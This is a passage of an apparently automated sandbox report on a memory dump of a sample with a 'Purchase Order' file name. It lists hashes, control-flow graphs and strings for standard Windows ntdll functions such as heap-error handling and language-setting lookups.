                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ba13430adbb1f53f3fc4c3446293a5768b406a80410730b3bf79942aca115e64
                                            • Instruction ID: e1599bb6bde06204609848d18242c17ac520c6a2ec0a0e565a2abf3a601ee9c2
                                            • Opcode Fuzzy Hash: ba13430adbb1f53f3fc4c3446293a5768b406a80410730b3bf79942aca115e64
                                            • Instruction Fuzzy Hash: E090023160550406D1007158452470664054FD0205F65C922A0425528D8795CA9965A3
                                            Function 34862C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1 34862c70-34862c7c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: be67bf25d5e817120f2a5aa3a6757ea1ffb6e4bff83522a054bcfbdfe0862697
                                            • Instruction ID: 04c37c4dedddf0a01ca6451e95219e44315dd8644025eefd40c2954eb5cfb948
                                            • Opcode Fuzzy Hash: be67bf25d5e817120f2a5aa3a6757ea1ffb6e4bff83522a054bcfbdfe0862697
                                            • Instruction Fuzzy Hash: E590023120148806D1107158841474A54054FD0305F59C922A4425618D8695C9D97122
                                            Function 34862DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2 34862df0-34862dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3f51eaf8add01181130a877e9237f13b63b5ad324ef66f9ed1726917027a5ab4
                                            • Instruction ID: 9bc8dc5e1c340745437dc5ffe10e08789f0f08e685b49db7851bf3adb830b09f
                                            • Opcode Fuzzy Hash: 3f51eaf8add01181130a877e9237f13b63b5ad324ef66f9ed1726917027a5ab4
                                            • Instruction Fuzzy Hash: F790023120140417D1117158451470754094FD0245F95C923A0425518D9656CA9AA122
                                            Function 34862B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 34862b60-34862b6c LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 83075888efd77a7416ceae62fd17b1bdd3cfee8e0b6ba647bc69d8ba5dc939c2
                                            • Instruction ID: 2dd5461ecd4cd12037aeb1e5f5fb29296ea738b5192a086cf17788097d9f4f51
                                            • Opcode Fuzzy Hash: 83075888efd77a7416ceae62fd17b1bdd3cfee8e0b6ba647bc69d8ba5dc939c2
                                            • Instruction Fuzzy Hash: 7690026120240007410571584424616940A4FE0205B55C532E1015550DC525C9D96126

                                            Non-executed Functions

                                            Function 348DFCAB Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 97 348dfcab-348dfcc3 GetPEB 98 348dfcc5-348dfce0 GetPEB call 3481b970 97->98 99 348dfce2-348dfce3 call 3481b970 97->99 103 348dfce8-348dfd0a call 3481b970 98->103 99->103 106 348dfd0c 103->106 107 348dfd81-348dfd8a GetPEB 103->107 108 348dfd2f-348dfd34 106->108 109 348dfd6e-348dfd73 106->109 110 348dfd28-348dfd2d 106->110 111 348dfd4b-348dfd50 106->111 112 348dfd44-348dfd49 106->112 113 348dfd67-348dfd6c 106->113 114 348dfd21-348dfd26 106->114 115 348dfd60-348dfd65 106->115 116 348dfd3d-348dfd42 106->116 117 348dfd7c 106->117 118 348dfd59-348dfd5e 106->118 119 348dfd1a-348dfd1f 106->119 120 348dfd75-348dfd7a 106->120 121 348dfd36-348dfd3b 106->121 122 348dfd13-348dfd18 106->122 123 348dfd52-348dfd57 106->123 124 348dfd8c-348dfda7 GetPEB call 3481b970 107->124 125 348dfda9-348dfdaa call 3481b970 107->125 108->107 109->107 110->107 111->107 112->107 113->107 114->107 115->107 116->107 117->107 118->107 119->107 120->107 121->107 122->107 123->107 128 348dfdaf-348dfdca call 3481b970 124->128 125->128 132 348dfe0d-348dfe13 128->132 133 348dfdcc-348dfdd5 GetPEB 128->133 136 348dfe15-348dfe1e GetPEB 132->136 137 348dfe56-348dfe5c 132->137 134 348dfdf4-348dfdf5 call 3481b970 133->134 135 348dfdd7-348dfdf2 GetPEB call 3481b970 133->135 151 348dfdfa-348dfe0c call 3481b970 134->151 135->151 142 348dfe3d-348dfe3e call 3481b970 136->142 143 348dfe20-348dfe3b GetPEB call 3481b970 136->143 138 348dfe9f-348dfea5 137->138 139 348dfe5e-348dfe67 GetPEB 137->139 145 348dfeaf-348dfeb8 GetPEB 138->145 146 348dfea7-348dfead 138->146 149 348dfe69-348dfe84 GetPEB call 3481b970 139->149 150 348dfe86-348dfe87 call 3481b970 139->150 153 348dfe43-348dfe55 call 3481b970 142->153 143->153 157 348dfeba-348dfed5 GetPEB call 3481b970 145->157 158 348dfed7-348dfed8 call 3481b970 145->158 146->145 156 348dfef7-348dff00 GetPEB 146->156 167 348dfe8c-348dfe9e call 3481b970 149->167 150->167 151->132 153->137 165 348dff1f-348dff20 call 3481b970 156->165 166 348dff02-348dff1d GetPEB call 3481b970 156->166 172 348dfedd-348dfef4 call 3481b970 157->172 158->172 175 348dff25-348dff3a call 3481b970 165->175 166->175 167->138 172->156
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 2994545307-2897834094
                                            • Opcode ID: f4e5d20f653519e817da22f36cef609d67eba8c86d04ba748de68643e10b1a25
                                            • Instruction ID: 42681a51eb48117a2fba202d7593595d75d031c992ee49cd9bed67eb03dcfc05
                                            • Opcode Fuzzy Hash: f4e5d20f653519e817da22f36cef609d67eba8c86d04ba748de68643e10b1a25
                                            • Instruction Fuzzy Hash: 5961C076917645EFF2029B58D890E1073E8EB0EA70B05439BEA01DF713DA348C86DE45
                                            Function 348C94E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 555 348c94e0-348c9529 556 348c9578-348c9587 555->556 557 348c952b-348c9530 555->557 558 348c9589-348c958e 556->558 559 348c9534-348c953a 556->559 557->559 562 348c9d13-348c9d27 call 34864c30 558->562 560 348c9695-348c96bd call 34869020 559->560 561 348c9540-348c9564 call 34869020 559->561 571 348c96dc-348c9712 560->571 572 348c96bf-348c96da call 348c9d2a 560->572 569 348c9566-348c9573 call 348e972b 561->569 570 348c9593-348c9634 GetPEB call 348cdc65 561->570 581 348c967d-348c9690 RtlDebugPrintTimes 569->581 582 348c9636-348c9644 570->582 583 348c9652-348c9667 570->583 576 348c9714-348c9716 571->576 572->576 576->562 580 348c971c-348c9731 RtlDebugPrintTimes 576->580 580->562 590 348c9737-348c973e 580->590 581->562 582->583 584 348c9646-348c964b 582->584 583->581 585 348c9669-348c966e 583->585 584->583 588 348c9670 585->588 589 348c9673-348c9676 585->589 588->589 589->581 590->562 591 348c9744-348c975f 590->591 592 348c9763-348c9774 call 348ca808 591->592 595 348c977a-348c977c 592->595 596 348c9d11 592->596 595->562 597 348c9782-348c9789 595->597 596->562 598 348c98fc-348c9902 597->598 599 348c978f-348c9794 597->599 600 348c9a9c-348c9aa2 598->600 601 348c9908-348c9937 call 34869020 598->601 602 348c97bc 599->602 603 348c9796-348c979c 599->603 605 348c9af4-348c9af9 600->605 606 348c9aa4-348c9aad 600->606 616 348c9939-348c9944 601->616 617 348c9970-348c9985 601->617 608 348c97c0-348c9811 call 34869020 RtlDebugPrintTimes 602->608 603->602 607 348c979e-348c97b2 603->607 611 348c9aff-348c9b07 605->611 612 348c9ba8-348c9bb1 605->612 606->592 610 348c9ab3-348c9aef call 34869020 606->610 613 348c97b8-348c97ba 607->613 614 348c97b4-348c97b6 607->614 608->562 641 348c9817-348c981b 608->641 635 348c9ce9 610->635 620 348c9b09-348c9b0d 611->620 621 348c9b13-348c9b3d call 348c8513 611->621 612->592 618 348c9bb7-348c9bba 612->618 613->608 614->608 623 348c994f-348c996e 616->623 624 348c9946-348c994d 616->624 628 348c9987-348c9989 617->628 629 348c9991-348c9998 617->629 625 348c9c7d-348c9cb4 call 34869020 618->625 626 348c9bc0-348c9c0a 618->626 620->612 620->621 647 348c9d08-348c9d0c 621->647 648 348c9b43-348c9b9e call 34869020 RtlDebugPrintTimes 621->648 634 348c99d9-348c99f6 RtlDebugPrintTimes 623->634 624->623 659 348c9cbb-348c9cc2 625->659 660 348c9cb6 625->660 632 348c9c0c 626->632 633 348c9c11-348c9c1e 626->633 636 348c998f 628->636 637 348c998b-348c998d 628->637 638 348c99bd-348c99bf 629->638 632->633 644 348c9c2a-348c9c2d 633->644 645 348c9c20-348c9c23 633->645 634->562 666 348c99fc-348c9a1f call 34869020 634->666 646 348c9ced 635->646 636->629 637->629 642 348c999a-348c99a4 638->642 643 348c99c1-348c99d7 638->643 650 348c981d-348c9825 641->650 651 348c986b-348c9880 641->651 656 348c99ad 642->656 657 348c99a6 642->657 643->634 654 348c9c2f-348c9c32 644->654 655 348c9c39-348c9c7b 644->655 645->644 653 348c9cf1-348c9d06 RtlDebugPrintTimes 646->653 647->592 648->562 684 348c9ba4 648->684 663 348c9827-348c9850 call 348c8513 650->663 664 348c9852-348c9869 650->664 665 348c9886-348c9894 651->665 653->562 653->647 654->655 655->653 669 348c99af-348c99b1 656->669 657->643 667 348c99a8-348c99ab 657->667 661 348c9ccd 659->661 662 348c9cc4-348c9ccb 659->662 660->659 672 348c9cd1-348c9cd7 661->672 662->672 674 348c9898-348c98ef call 34869020 RtlDebugPrintTimes 663->674 664->665 665->674 687 348c9a3d-348c9a58 666->687 688 348c9a21-348c9a3b 666->688 667->669 670 348c99bb 669->670 671 348c99b3-348c99b5 669->671 670->638 671->670 678 348c99b7-348c99b9 671->678 679 348c9cde-348c9ce4 672->679 680 348c9cd9-348c9cdc 672->680 674->562 691 348c98f5-348c98f7 674->691 678->638 679->646 685 348c9ce6 679->685 680->635 684->612 685->635 689 348c9a5d-348c9a8b RtlDebugPrintTimes 687->689 688->689 689->562 693 348c9a91-348c9a97 689->693 691->647 693->618
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $ $0
                                            • API String ID: 3446177414-3352262554
                                            • Opcode ID: 213cd1e9a190f54fe6a29ee78c9afd909fd95fefe48aceb894f97123d027f813
                                            • Instruction ID: 32ec81bdf032b409a743e72d8208c36d67d9a2fd95b5b3257e535cb2ee9b6ade
                                            • Opcode Fuzzy Hash: 213cd1e9a190f54fe6a29ee78c9afd909fd95fefe48aceb894f97123d027f813
                                            • Instruction Fuzzy Hash: CC3203B16083818FE350CF68C984B5BFBE5BB88354F004A6EF59987290D7B5D94ACF52
                                            Function 348D0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1298 348d0274-348d0296 call 34877e54 1301 348d0298-348d02b0 RtlDebugPrintTimes 1298->1301 1302 348d02b5-348d02cd call 348176b2 1298->1302 1306 348d0751-348d0760 1301->1306 1307 348d06f7 1302->1307 1308 348d02d3-348d02e9 1302->1308 1311 348d06fa-348d074e call 348d0766 1307->1311 1309 348d02eb-348d02ee 1308->1309 1310 348d02f0-348d02f2 1308->1310 1312 348d02f3-348d030a 1309->1312 1310->1312 1311->1306 1314 348d06b1-348d06ba GetPEB 1312->1314 1315 348d0310-348d0313 1312->1315 1317 348d06bc-348d06d7 GetPEB call 3481b970 1314->1317 1318 348d06d9-348d06de call 3481b970 1314->1318 1315->1314 1319 348d0319-348d0322 1315->1319 1326 348d06e3-348d06f4 call 3481b970 1317->1326 1318->1326 1323 348d033e-348d0351 call 348d0cb5 1319->1323 1324 348d0324-348d033b call 3482ffb0 1319->1324 1332 348d035c-348d0370 call 3481758f 1323->1332 1333 348d0353-348d035a 1323->1333 1324->1323 1326->1307 1337 348d0376-348d0382 GetPEB 1332->1337 1338 348d05a2-348d05a7 1332->1338 1333->1332 1339 348d0384-348d0387 1337->1339 1340 348d03f0-348d03fb 1337->1340 1338->1311 1341 348d05ad-348d05b9 GetPEB 1338->1341 1344 348d0389-348d03a4 GetPEB call 3481b970 1339->1344 1345 348d03a6-348d03ab call 3481b970 1339->1345 1342 348d04e8-348d04fa call 348327f0 1340->1342 1343 348d0401-348d0408 1340->1343 1346 348d05bb-348d05be 1341->1346 1347 348d0627-348d0632 1341->1347 1363 348d0590-348d059d call 348d11a4 call 348d0cb5 1342->1363 1364 348d0500-348d0507 1342->1364 1343->1342 1348 348d040e-348d0417 1343->1348 1361 348d03b0-348d03d1 call 3481b970 GetPEB 1344->1361 1345->1361 1351 348d05dd-348d05e2 call 3481b970 1346->1351 1352 348d05c0-348d05db GetPEB call 3481b970 1346->1352 1347->1311 1349 348d0638-348d0643 1347->1349 1356 348d0419-348d0429 1348->1356 1357 348d0438-348d043c 1348->1357 1349->1311 1358 348d0649-348d0654 1349->1358 1371 348d05e7-348d05fb call 3481b970 1351->1371 1352->1371 1356->1357 1365 348d042b-348d0435 call 348ddac6 1356->1365 1367 348d044e-348d0454 1357->1367 1368 348d043e-348d044c call 34853bc9 1357->1368 1358->1311 1366 348d065a-348d0663 GetPEB 1358->1366 1361->1342 1392 348d03d7-348d03eb 1361->1392 1363->1338 1373 348d0509-348d0510 1364->1373 1374 348d0512-348d051a 1364->1374 1365->1357 1377 348d0665-348d0680 GetPEB call 3481b970 1366->1377 1378 348d0682-348d0687 call 3481b970 1366->1378 1380 348d0457-348d0460 1367->1380 1368->1380 1393 348d05fe-348d0608 GetPEB 1371->1393 1373->1374 1383 348d051c-348d052c 1374->1383 1384 348d0538-348d053c 1374->1384 1399 348d068c-348d06ac call 348c86ba call 3481b970 1377->1399 1378->1399 1390 348d0472-348d0475 1380->1390 1391 348d0462-348d0470 1380->1391 1383->1384 1394 348d052e-348d0533 call 348ddac6 1383->1394 1396 348d056c-348d0572 1384->1396 1397 348d053e-348d0551 call 34853bc9 1384->1397 1400 348d04e5 1390->1400 1401 348d0477-348d047e 1390->1401 1391->1390 1392->1342 1393->1311 1404 348d060e-348d0622 1393->1404 1394->1384 1403 348d0575-348d057c 1396->1403 1415 348d0563 1397->1415 1416 348d0553-348d0561 call 3484fe99 1397->1416 1399->1393 1400->1342 1401->1400 1402 348d0480-348d048b 1401->1402 1402->1400 1408 348d048d-348d0496 GetPEB 1402->1408 1403->1363 1409 348d057e-348d058e 1403->1409 1404->1311 1413 348d0498-348d04b3 GetPEB call 3481b970 1408->1413 1414 348d04b5-348d04ba call 3481b970 1408->1414 1409->1363 1423 348d04bf-348d04dd call 348c86ba call 3481b970 1413->1423 1414->1423 1421 348d0566-348d056a 1415->1421 1416->1421 1421->1403 1423->1400
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 3446177414-1700792311
                                            • Opcode ID: 4f09f82f196238f5b9c9bb4f4d3fabc5632c61378ed27385f1e3001b20f96439
                                            • Instruction ID: 7d2d8540bfd90c9249c3d6e4a154e0daede5ca725b7d1cb9f98bb90d741c1dc1
                                            • Opcode Fuzzy Hash: 4f09f82f196238f5b9c9bb4f4d3fabc5632c61378ed27385f1e3001b20f96439
                                            • Instruction Fuzzy Hash: DBD1EE79506685DFEB02CFA8C800AADBBF1FF4B318F44825AE455AB352D7359982CF14
                                            Function 348D12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                            • API String ID: 0-3591852110
                                            • Opcode ID: 35197c8d6559bf583907abe6d2648b63d19956e200a0e0431853c32469ef9f49
                                            • Instruction ID: 4dea33e4f8e77ecc1f867599e87b1e95073697bb2cdd30b79b6793e45dbc3708
                                            • Opcode Fuzzy Hash: 35197c8d6559bf583907abe6d2648b63d19956e200a0e0431853c32469ef9f49
                                            • Instruction Fuzzy Hash: 6212DD74601746DFE715CF68C440BAABBF6FF0A314F44869DE4968B652E738E881CB50
                                            Function 3481D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                            • API String ID: 0-3532704233
                                            • Opcode ID: a16f6775dd6f378b03bd23c9f0628e3d66b9314928768e4478db60a7c098422b
                                            • Instruction ID: 128a970d629f0682891c9aac7435af0a396874a0c54253aea839b82f556a76d6
                                            • Opcode Fuzzy Hash: a16f6775dd6f378b03bd23c9f0628e3d66b9314928768e4478db60a7c098422b
                                            • Instruction Fuzzy Hash: EAB1ADB1508355DFE711CF28C890B9BBBE8AF88758F414A2EF899D7200D774E905CB92
                                            Function 34831070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3570731704
                                            • Opcode ID: b1dec75a44b21e5d49b0d71e98f8a6026e054ee4d0a09d8e85c8c6de3250464b
                                            • Instruction ID: d7173960b92ac1a61f8293dfd360f477e473c324892ff45c60a5daac3ab35b81
                                            • Opcode Fuzzy Hash: b1dec75a44b21e5d49b0d71e98f8a6026e054ee4d0a09d8e85c8c6de3250464b
                                            • Instruction Fuzzy Hash: CC924A79A02328CFEB60CF18CC40B99B7B5BF49754F0582EAD949A7291D7749E80CF91
                                            Function 3484D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3484D959
                                              • Part of subcall function 34824859: RtlDebugPrintTimes.NTDLL ref: 348248F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1975516107
                                            • Opcode ID: 613e83d563bf3d1f9f8fa59fc980d94c21a0dc31e07ca5bb1bb5fcccc531201d
                                            • Instruction ID: 13a0e8a735b22631ebeb49a75d06473f8f1c5f1d0d93388da3438bc866a32837
                                            • Opcode Fuzzy Hash: 613e83d563bf3d1f9f8fa59fc980d94c21a0dc31e07ca5bb1bb5fcccc531201d
                                            • Instruction Fuzzy Hash: 4D51BC75A04349DFEB01CFA8C48079DBBF1FB48328F164659D811AB381D7B4A986DF80
                                            Function 348B9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                            • API String ID: 0-3063724069
                                            • Opcode ID: 97f7e154ab84ce4a3bf84595fec1e82127bd818d92de78d2e3012ca8ffe149bb
                                            • Instruction ID: 5678a270a11abe5f58dbea2fef079b4332ebbac9cb54e08e5904439f4cdeb8d9
                                            • Opcode Fuzzy Hash: 97f7e154ab84ce4a3bf84595fec1e82127bd818d92de78d2e3012ca8ffe149bb
                                            • Instruction Fuzzy Hash: 6ED1C3B2809315AFEB21CB54C840B6BB7E8AF85754F404B2DF9D4A7350E774C94A8F92
                                            Function 3481D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3481D262
                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 3481D196
                                            • @, xrefs: 3481D313
                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3481D146
                                            • @, xrefs: 3481D2AF
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3481D2C3
                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3481D0CF
                                            • @, xrefs: 3481D0FD
                                            Memory Dump Source
